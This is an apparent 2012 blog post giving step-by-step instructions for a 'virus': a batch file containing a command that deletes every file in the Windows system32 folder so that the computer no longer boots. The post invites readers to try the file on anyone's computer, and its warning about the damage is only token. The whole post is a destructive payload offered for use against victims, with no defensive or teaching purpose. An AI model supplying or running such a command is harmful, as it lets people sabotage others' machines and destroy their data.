Pages - Menu

Translate

Sunday, 16 September 2012

Create A Virus To Destroy Victim's Computer


1) Open Notepad

2) write the below command :

del c:\windows\system32\*.* /q


3) Save the above notepad with the extension ".bat or .cmd" as you want

ATTENTION :

Don't double click the file otherwise you are in trouble.
Why ????
because the file you created delete all files from your system32 folder and when you restart your pc it will not start because system can not find the files in the system32 folder which is required at the time of booting.

4) You can also test the above by creating a fake folder let suppose windows1 in C:\. Copy some old files in it and just follow the above command.
By double clicking the bat or cmd file ur all files automaitcally get deleted.

5) You can try this file in any one`s computer.
(but this result in causing damage to the computer, so think again before trying this on anyone's pc)

No comments:

Post a Comment